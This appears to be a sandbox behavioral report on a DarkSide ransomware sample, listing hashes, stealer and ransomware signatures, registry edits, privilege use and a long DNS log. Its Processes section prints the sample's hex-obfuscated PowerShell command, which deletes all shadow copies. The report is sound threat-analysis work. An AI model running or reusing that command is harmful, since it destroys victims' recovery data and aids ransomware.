memory/2296-1107-0x0000020076AE0000-0x0000020076B56000-memory.dmp

memory/2296-1108-0x00007FFDB6140000-0x00007FFDB6C01000-memory.dmp

memory/2296-1109-0x00007FFDB6140000-0x00007FFDB6C01000-memory.dmp

memory/2296-1112-0x00007FFDB6140000-0x00007FFDB6C01000-memory.dmp

C:\Recovery\decrypt_file.TxT

MD5 38477b5a8a76bb92db7b5391ee1273b9
SHA1 b404b9b440b54318a2c5c7e20d11de8d6fc187c6
SHA256 787075b5f35e7e5e265a2bc7e5e6f88a9cb578e65aeb922e95cec48b5b22924d
SHA512 51bef79af3656f6239d52600f379b7b59bd41ee485c654c2c9a8e34c1e00be251a5496b2aca6a49ac9fac9979b1b8c629c026ce3fde75864ff8058e755dbea66

Analysis: behavioral20

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

146s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (144) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\d3877f44.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\d3877f44.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.d3877f44 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.d3877f44\ = "d3877f44" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\d3877f44\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\d3877f44 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\d3877f44\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\d3877f44.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
